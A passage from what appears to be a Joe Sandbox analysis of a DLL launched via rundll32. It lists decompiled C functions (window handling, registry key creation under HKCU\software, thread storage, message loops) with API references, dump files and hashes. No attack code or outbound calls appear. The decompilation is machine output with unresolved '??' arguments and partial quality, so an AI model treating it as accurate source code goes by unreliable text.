                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t32;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(1004F010,00000000,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037742
                                                                                                            • TlsGetValue.KERNEL32(1004EFF4,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037760
                                                                                                            • LocalAlloc.KERNEL32(00000000,00000003,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD), ref: 100377BC
                                                                                                            • LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4), ref: 100377CE
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 100377DB
                                                                                                            • TlsSetValue.KERNEL32(1004EFF4,00000000), ref: 1003780B
                                                                                                            • LeaveCriticalSection.KERNEL32(1004F010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 1003782C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                                                            • String ID:
                                                                                                            • API String ID: 784703316-0
                                                                                                            • Opcode ID: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                                                            • Instruction ID: 1d31c533a979c77301d76d8eb0d2db078f0d9c8120d6b2d843174624ed3e927a
                                                                                                            • Opcode Fuzzy Hash: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                                                            • Instruction Fuzzy Hash: F8317C75600615AFD726DF59C8C8C5ABBE5FF08352B11C929E81ADB611CB30FC50CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 79%
                                                                                                            			E1000F6EA(void* __ebx, void* __ecx) {
                                                                                                            				void* __ebp;
                                                                                                            				void* _t28;
                                                                                                            				void* _t36;
                                                                                                            				signed char _t37;
                                                                                                            				intOrPtr _t41;
                                                                                                            				void* _t42;
                                                                                                            				void* _t44;
                                                                                                            				intOrPtr _t45;
                                                                                                            				void* _t46;
                                                                                                            
                                                                                                            				_t39 = __ecx;
                                                                                                            				_t36 = __ebx;
                                                                                                            				_t41 =  *((intOrPtr*)(_t46 + 0x10));
                                                                                                            				if(_t41 == 0) {
                                                                                                            					_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                                                                            					L14:
                                                                                                            					_t42 = E100220EE(_t45, GetTopWindow( *(_t45 + 0x1c)));
                                                                                                            					if(_t42 != 0) {
                                                                                                            						L7:
                                                                                                            						if((GetWindowLongA( *(_t42 + 0x1c), 0xffffffec) & 0x00010000) == 0) {
                                                                                                            							L18:
                                                                                                            							return _t42;
                                                                                                            						}
                                                                                                            						_push(_t36);
                                                                                                            						_t37 =  *(_t46 + 0x1c);
                                                                                                            						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x1c)) != 0) {
                                                                                                            							if((_t37 & 0x00000002) == 0) {
                                                                                                            								L16:
                                                                                                            								_push(_t37);
                                                                                                            								_push(0);
                                                                                                            								_push(_t42);
                                                                                                            								goto L17;
                                                                                                            							}
                                                                                                            							_t39 = _t42;
                                                                                                            							if(E100203CE(_t42) != 0) {
                                                                                                            								goto L16;
                                                                                                            							}
                                                                                                            							goto L12;
                                                                                                            						} else {
                                                                                                            							L12:
                                                                                                            							_push(_t37);
                                                                                                            							_push(_t42);
                                                                                                            							_push(_t45);
                                                                                                            							L17:
                                                                                                            							_t42 = E1000F6EA(_t37, _t39);
                                                                                                            							goto L18;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					return _t45;
                                                                                                            				}
                                                                                                            				_t28 = E100220EE(_t44, GetWindow( *(_t41 + 0x1c), 2));
                                                                                                            				_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                                                                            				while(_t28 == 0) {
                                                                                                            					_t41 = E1000F695(_t45, E100220EE(_t45, GetParent( *(_t41 + 0x1c))));
                                                                                                            					if(_t41 == 0 || _t41 == _t45) {
                                                                                                            						goto L14;
                                                                                                            					} else {
                                                                                                            						_t28 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t42 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
                                                                                                            				goto L7;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$LongParentVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 506644340-0
                                                                                                            • Opcode ID: e05f7d3be3f5bc05d13bf1b8876ce0f3ed84c428b3ff9c55c238cc21a07b9566
                                                                                                            • Instruction ID: 9ff0abfdc9ec089c08616602c8c252ca1eec58daf7253e76d9435a222983167d
                                                                                                            • Opcode Fuzzy Hash: e05f7d3be3f5bc05d13bf1b8876ce0f3ed84c428b3ff9c55c238cc21a07b9566
                                                                                                            • Instruction Fuzzy Hash: 2B21C1366087286FE732EEA19C49F2B769CEF406D0F02491CF845E7596C760EC01D791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10024AA1(void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				CHAR* _t21;
                                                                                                            				CHAR* _t22;
                                                                                                            				int _t31;
                                                                                                            				CHAR* _t33;
                                                                                                            				intOrPtr _t35;
                                                                                                            				CHAR* _t40;
                                                                                                            				void* _t44;
                                                                                                            				void* _t47;
                                                                                                            
                                                                                                            				_t40 = _a4;
                                                                                                            				_t31 = lstrlenA(_t40);
                                                                                                            				_t21 = E10038481(_t40, 0, 0) - 1;
                                                                                                            				_t44 = _t31 - _t21;
                                                                                                            				_t35 = _t44 + _t40;
                                                                                                            				_a4 = _t21;
                                                                                                            				_v8 = _t35;
                                                                                                            				if(_a8 < _t31) {
                                                                                                            					if(_a8 >= _t21) {
                                                                                                            						_t33 =  &(_t40[2]);
                                                                                                            						if( *_t40 == 0x5c && _t40[1] == 0x5c) {
                                                                                                            							while( *_t33 != 0x5c) {
                                                                                                            								_t33 = E100127D1(_t33);
                                                                                                            							}
                                                                                                            						}
                                                                                                            						if(_t44 > 3) {
                                                                                                            							do {
                                                                                                            								_t33 = E100127D1(_t33);
                                                                                                            							} while ( *_t33 != 0x5c);
                                                                                                            						}
                                                                                                            						_t22 = _a4;
                                                                                                            						_t47 = _t33 - _t40;
                                                                                                            						_t12 =  &(_t22[5]); // 0x5
                                                                                                            						if(_a8 >= _t47 + _t12) {
                                                                                                            							while(lstrlenA(_t33) + _t47 + 4 > _a8) {
                                                                                                            								do {
                                                                                                            									_t33 = E100127D1(_t33);
                                                                                                            								} while ( *_t33 != 0x5c);
                                                                                                            							}
                                                                                                            							 *((char*)(_t47 + _t40)) = 0;
                                                                                                            							lstrcatA(_t40, "\\...");
                                                                                                            							_t21 = lstrcatA(_t40, _t33);
                                                                                                            						} else {
                                                                                                            							_push(_v8);
                                                                                                            							goto L14;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						if(_a12 == 0) {
                                                                                                            							_t35 = 0x1003da51;
                                                                                                            						}
                                                                                                            						_push(_t35);
                                                                                                            						L14:
                                                                                                            						_t21 = lstrcpyA(_t40, ??);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t21;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                                                              • Part of subcall function 10038481: PathFindFileNameA.SHLWAPI(?,10024ABE,?,00000000,00000000), ref: 10038485
                                                                                                              • Part of subcall function 10038481: lstrlenA.KERNEL32(00000000), ref: 10038493
                                                                                                            • lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 10024B44
                                                                                                            • lstrcatA.KERNEL32(?,\...), ref: 10024B63
                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 10024B67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$lstrcat$FileFindNamePathlstrcpy
                                                                                                            • String ID: \...
                                                                                                            • API String ID: 1604900594-1167917071
                                                                                                            • Opcode ID: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                                                            • Instruction ID: ad9d98bbfb168da91c5fc0e9dd0c54a6fb05e1c2565fcdf0eb8a60c119eae97e
                                                                                                            • Opcode Fuzzy Hash: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                                                            • Instruction Fuzzy Hash: 7D21E57590075AAEEB22CB70ACC4F5B7BF8DB05296F52805EE9059B042EB74E940CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 61%
                                                                                                            			E100304C6(void* __ecx) {
                                                                                                            				struct tagMSG _v28;
                                                                                                            				void* __ebp;
                                                                                                            				int _t21;
                                                                                                            				intOrPtr _t24;
                                                                                                            				intOrPtr _t33;
                                                                                                            				void* _t38;
                                                                                                            				void* _t39;
                                                                                                            				int _t40;
                                                                                                            
                                                                                                            				_push(0);
                                                                                                            				_t39 = __ecx;
                                                                                                            				_t40 = 0xf;
                                                                                                            				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
                                                                                                            					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
                                                                                                            					if(_t21 != 0) {
                                                                                                            						DispatchMessageA( &_v28);
                                                                                                            						_push(0);
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            					return _t21;
                                                                                                            				}
                                                                                                            				_t24 =  *((intOrPtr*)(_t39 + 0x68));
                                                                                                            				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x80));
                                                                                                            				 *(_t39 + 0x78) =  *(_t24 + 0x7c) & 0x0000f000;
                                                                                                            				SetRectEmpty(_t39 + 0xc);
                                                                                                            				 *((intOrPtr*)(_t39 + 0x20)) = 0;
                                                                                                            				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
                                                                                                            				 *((intOrPtr*)(_t39 + 0x24)) = 0;
                                                                                                            				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
                                                                                                            				 *((intOrPtr*)(_t39 + 0x80)) = 0;
                                                                                                            				_t38 = E100220EE(_t40, GetDesktopWindow());
                                                                                                            				if(LockWindowUpdate( *(_t38 + 0x1c)) == 0) {
                                                                                                            					_push(3);
                                                                                                            				} else {
                                                                                                            					_push(0x403);
                                                                                                            				}
                                                                                                            				_push(GetDCEx( *(_t38 + 0x1c), 0, ??));
                                                                                                            				_t33 = E10029068();
                                                                                                            				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
                                                                                                            				return _t33;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • GetMessageA.USER32 ref: 100304E5
                                                                                                            • DispatchMessageA.USER32 ref: 100304F8
                                                                                                            • PeekMessageA.USER32(0000000F,00000000,0000000F,0000000F,00000000), ref: 10030507
                                                                                                            • SetRectEmpty.USER32(?), ref: 10030528
                                                                                                            • GetDesktopWindow.USER32 ref: 10030540
                                                                                                            • LockWindowUpdate.USER32(?,00000000), ref: 10030551
                                                                                                            • GetDCEx.USER32(?,00000000,00000003), ref: 10030568
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1192691108-0
                                                                                                            • Opcode ID: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                                                            • Instruction ID: 8a91eee366d4ec1ad94f649a4fc85a3a9efab89b356857822c8a99d212f9e85e
                                                                                                            • Opcode Fuzzy Hash: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                                                            • Instruction Fuzzy Hash: 39215EB2500B09AFE311DF66DC84E57BBECFB04251F41492EF655CA511D735E9448F60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100358C8(intOrPtr __ecx) {
                                                                                                            				void* _v8;
                                                                                                            				void* _v12;
                                                                                                            				void* _v16;
                                                                                                            				int _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr _t32;
                                                                                                            
                                                                                                            				_t32 = __ecx;
                                                                                                            				_v24 = __ecx;
                                                                                                            				_v16 = 0;
                                                                                                            				_v8 = 0;
                                                                                                            				_v12 = 0;
                                                                                                            				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x50), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                                                                                                            					RegCreateKeyExA(_v12,  *(_v24 + 0x64), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                                                                                                            				}
                                                                                                            				if(_v8 != 0) {
                                                                                                            					RegCloseKey(_v8);
                                                                                                            				}
                                                                                                            				if(_v12 != 0) {
                                                                                                            					RegCloseKey(_v12);
                                                                                                            				}
                                                                                                            				return _v16;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10035945
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreate$Open
                                                                                                            • String ID: software
                                                                                                            • API String ID: 1740278721-2010147023
                                                                                                            • Opcode ID: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                                                            • Instruction ID: f89c3a735d8d1ef68568a63ef4ea0061cb5f0d4f5e3c764e69df4fb83dc90cc3
                                                                                                            • Opcode Fuzzy Hash: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                                                            • Instruction Fuzzy Hash: BF11B37690029DFFDB12DB9ACD88DDFBFBCEF89755F1040AAE500A6121D2719A00DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 58%
                                                                                                            			E10007B50(intOrPtr _a4, intOrPtr* _a8) {
                                                                                                            				void _v20;
                                                                                                            				int _t14;
                                                                                                            				int _t18;
                                                                                                            				intOrPtr* _t23;
                                                                                                            
                                                                                                            				if(E1000799F() == 0) {
                                                                                                            					if(_a4 != 0x12340042) {
                                                                                                            						L9:
                                                                                                            						_t14 = 0;
                                                                                                            						L10:
                                                                                                            						return _t14;
                                                                                                            					}
                                                                                                            					_t23 = _a8;
                                                                                                            					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                                                                                                            						goto L9;
                                                                                                            					} else {
                                                                                                            						 *((intOrPtr*)(_t23 + 4)) = 0;
                                                                                                            						 *((intOrPtr*)(_t23 + 8)) = 0;
                                                                                                            						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
                                                                                                            						_t18 = GetSystemMetrics(1);
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						 *(_t23 + 0x10) = _t18;
                                                                                                            						 *((intOrPtr*)(_t23 + 0x24)) = 1;
                                                                                                            						if( *_t23 >= 0x48) {
                                                                                                            							lstrcpynA(_t23 + 0x28, "DISPLAY", 0x20);
                                                                                                            						}
                                                                                                            						_t14 = 1;
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return  *0x1004ee08(_a4, _a8);
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 10007B8E
                                                                                                            • GetSystemMetrics.USER32 ref: 10007BA6
                                                                                                            • GetSystemMetrics.USER32 ref: 10007BAD
                                                                                                            • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 10007BD3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                                                            • String ID: B$DISPLAY
                                                                                                            • API String ID: 2307409384-3316187204
                                                                                                            • Opcode ID: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                                                            • Instruction ID: f9e3eb19a9beaf27ca7ac5b5242ad86db65a0bc6b8874f4885458b15db7551ae
                                                                                                            • Opcode Fuzzy Hash: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                                                            • Instruction Fuzzy Hash: B6117771A012399FEB12DF658C84B5B7BA8FF05791B118466FD09AE109D374DD40CBD0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 10020D8D
                                                                                                            • GetWindowRect.USER32 ref: 10020DA8
                                                                                                            • ScreenToClient.USER32 ref: 10020DBB
                                                                                                            • ScreenToClient.USER32 ref: 10020DC4
                                                                                                            • EqualRect.USER32 ref: 10020DCE
                                                                                                            • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10020DF6
                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10020E00
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                                                            • String ID:
                                                                                                            • API String ID: 443303494-0
                                                                                                            • Opcode ID: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                                                            • Instruction ID: 0a58a577598c21a1846f40493314dc2d021d714bbb101a3e6ae2e9ccd4581a15
                                                                                                            • Opcode Fuzzy Hash: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                                                            • Instruction Fuzzy Hash: C1113D7650021AAFDB01DFA5DC84EBBBBBEEF84310B118419F916E7112D770A940CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 41%
                                                                                                            			E1001519D(void* __edi) {
                                                                                                            				void* __ebx;
                                                                                                            				void* __esi;
                                                                                                            				long _t5;
                                                                                                            				long _t11;
                                                                                                            				long _t12;
                                                                                                            				long* _t17;
                                                                                                            
                                                                                                            				_t5 = GetLastError();
                                                                                                            				_t12 = _t5;
                                                                                                            				_t17 =  *0x1004f5e0( *0x1004c848);
                                                                                                            				_t18 = _t17;
                                                                                                            				if(_t17 == 0) {
                                                                                                            					_push(0x8c);
                                                                                                            					_push(1);
                                                                                                            					_t17 = E1001382A(_t12, __edi, _t17, _t18);
                                                                                                            					if(_t17 == 0) {
                                                                                                            						L4:
                                                                                                            						E10011400(0x10);
                                                                                                            					} else {
                                                                                                            						_push(_t17);
                                                                                                            						_push( *0x1004c848);
                                                                                                            						if( *0x1004f5e4() == 0) {
                                                                                                            							goto L4;
                                                                                                            						} else {
                                                                                                            							_t17[0x15] = 0x1004cb00;
                                                                                                            							_t17[5] = 1;
                                                                                                            							_t11 = GetCurrentThreadId();
                                                                                                            							_t17[1] = _t17[1] | 0xffffffff;
                                                                                                            							 *_t17 = _t11;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				SetLastError(_t12);
                                                                                                            				return _t17;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
                                                                                                            • FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                                                            • SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                                                              • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                                                              • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                                                            • FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 100151EC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1487844433-4125583295
                                                                                                            • Opcode ID: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                                                            • Instruction ID: 04c9e0168ef1b4a2d5000d056184ae8950552c627320cfc90ecd4b0af594dd98
                                                                                                            • Opcode Fuzzy Hash: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                                                            • Instruction Fuzzy Hash: F4F0C2326017269FE3225F648C49E463BE0EB017A2F104219F942CE1E1DFB5C8808794
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 85%
                                                                                                            			E1000ECE8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				intOrPtr _t155;
                                                                                                            				signed int _t167;
                                                                                                            				signed short _t168;
                                                                                                            				intOrPtr* _t170;
                                                                                                            				void* _t172;
                                                                                                            				signed short _t181;
                                                                                                            				signed short _t183;
                                                                                                            				void* _t186;
                                                                                                            				signed short _t189;
                                                                                                            				signed short _t191;
                                                                                                            				signed short _t196;
                                                                                                            				signed short _t198;
                                                                                                            				signed short _t207;
                                                                                                            				long long* _t214;
                                                                                                            				intOrPtr* _t218;
                                                                                                            				void* _t220;
                                                                                                            				void* _t226;
                                                                                                            				void* _t229;
                                                                                                            				intOrPtr* _t231;
                                                                                                            				void* _t237;
                                                                                                            				void* _t240;
                                                                                                            				signed int _t243;
                                                                                                            				signed short _t244;
                                                                                                            				signed short _t245;
                                                                                                            				signed short _t249;
                                                                                                            				signed short _t253;
                                                                                                            				intOrPtr* _t254;
                                                                                                            				intOrPtr _t276;
                                                                                                            				void* _t318;
                                                                                                            				intOrPtr* _t326;
                                                                                                            				void* _t327;
                                                                                                            				signed long long _t335;
                                                                                                            
                                                                                                            				_t318 = __edx;
                                                                                                            				E10011BF0(0x1003b04c, _t327);
                                                                                                            				_t155 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				 *((intOrPtr*)(_t327 - 0x10)) = _t155;
